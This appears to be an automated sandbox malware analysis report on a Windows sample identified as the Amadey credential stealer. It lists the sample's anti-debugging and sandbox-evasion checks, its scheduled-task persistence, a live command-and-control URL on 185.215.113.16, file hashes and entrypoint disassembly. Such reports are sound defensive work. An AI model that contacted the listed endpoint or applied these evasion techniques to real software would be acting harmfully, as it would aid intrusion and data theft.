                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04820C91 rdtsc 0_2_04820C91
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 413Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 8548Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460Thread sleep count: 47 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460Thread sleep time: -94047s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468Thread sleep count: 50 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468Thread sleep time: -100050s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440Thread sleep count: 413 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440Thread sleep time: -12390000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7564Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472Thread sleep count: 54 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472Thread sleep time: -108054s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452Thread sleep count: 81 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452Thread sleep time: -162081s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452Thread sleep count: 8548 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452Thread sleep time: -17104548s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
                  Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.2499234685.000000000054A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: setup.exe, 00000000.00000002.1335711226.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000004.00000002.1346750099.0000000000C71000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04820C91 rdtsc 0_2_04820C91
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AA645B mov eax, dword ptr fs:[00000030h]13_2_00AA645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00AAA1C2 mov eax, dword ptr fs:[00000030h]13_2_00AAA1C2
                  Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: TProgram Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A8D312 cpuid 13_2_00A8D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00A8CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,13_2_00A8CB1A

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 13.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.setup.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1306286454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory741
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS251
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  setup.exe55%ReversingLabsWin32.Packed.Generic
                  setup.exe100%AviraTR/Crypt.TPM.Gen
                  setup.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe58%ReversingLabsWin32.Trojan.Amadey

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://185.215.113.16/Jo89Ku7d/index.php%100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpi100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpdedS100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpY100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php)100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpHja100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpa100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpncodedt100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpIif100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php1100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php&i100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpmkB100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpU100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phptrue
                  • Avira URL Cloud: phishing
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phpdedSaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php)axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php%axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpaaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpHjaaxplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpYaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpncodedtaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpIifaxplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpmkBaxplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpUaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php&iaxplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php1axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.16
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483214
                  Start date and time:2024-07-26 21:01:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:setup.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 4600 because there are no executed function
                  • Execution Graph export aborted for target setup.exe, PID 4476 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: setup.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  16:32:02API Interceptor1475077x Sleep call for process: axplong.exe modified
                  21:01:59Task SchedulerRun new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.16setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  EXyAlLKIck.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  PE1dBCFKZv.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLsetup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousRedLineBrowse
                  • 185.215.113.9
                  file.exeGet hashmaliciousRedLineBrowse
                  • 185.215.113.9
                  6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16
                  SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exefile.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                    Download File
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1939456
                    Entropy (8bit):7.9495212303989495
                    Encrypted:false
                    SSDEEP:49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
                    MD5:C6620FE2690605F20F5B9C970E8130C6
                    SHA1:F5A500BAB75CEC90F2A004566CC61EF6484BE12C
                    SHA-256:EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
                    SHA-512:C9D30D3000F27D6E2A49A6491CE31E371A6235D53E3E22D3B69D50A932F230F1C425C37AD4E64925418B590933FB4F79C391C895F31C91171930696B37AAFBAB
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Joe Sandbox View:
                    • Filename: file.exe, Detection: malicious, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M.....6x....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...etmksbbt.....`2..~..................@...iosnleeh......L......r..............@....taggant.0....L.."...v..............@...........................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Windows\Tasks\axplong.job

                    Download File
                    Process:C:\Users\user\Desktop\setup.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):308
                    Entropy (8bit):3.5318333830177413
                    Encrypted:false
                    SSDEEP:6:RawtDspQZX2JUEZ+lX1lOJUPelkDdtcVAkXIEZ8MlW8+y0l1XWt0:RDBsil2JQ1lOmeeDhkXd8kX+V1Gt0
                    MD5:9072C1891241FC6A1E2C897EE3143D3D
                    SHA1:0D43DA8589FEA65BC2377F1BD4AD5F0A1CB23C90
                    SHA-256:08957B827290F305098C21A4D5889DA9044F751584F906EECC037C942C4B6616
                    SHA-512:B4FCBBDBD8756EF0377938341AEF2AFA445CE0C3FE219F20C8AB60802D71281B02EBA02DFA383286F1BAEEFF76C44A82F5CC27A453CDAB7E4D9E334537C6E17B
                    Malicious:false
                    Reputation:low
                    Preview:..........B..x/t>7.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.9495212303989495
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:setup.exe
                    File size:1'939'456 bytes
                    MD5:c6620fe2690605f20f5b9c970e8130c6
                    SHA1:f5a500bab75cec90f2a004566cc61ef6484be12c
                    SHA256:ee170a14d676b69cab768f8a94e482ee9ad6dc1766038d6e26c24fe2cfbd7677
                    SHA512:c9d30d3000f27d6e2a49a6491ce31e371a6235d53e3e22d3b69d50a932f230f1c425c37ad4e64925418b590933fb4f79c391c895f31c91171930696b37aafbab
                    SSDEEP:49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
                    TLSH:12953343C97EA759C01B8F7ADAF04D0D944457CE83B2A94E8AEA313B9F07709C572E85
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x8cf000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007FE0B483819Ah
                    pcmpeqd mm3, qword ptr [00000000h]
                    add cl, ch
                    add byte ptr [eax], ah
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
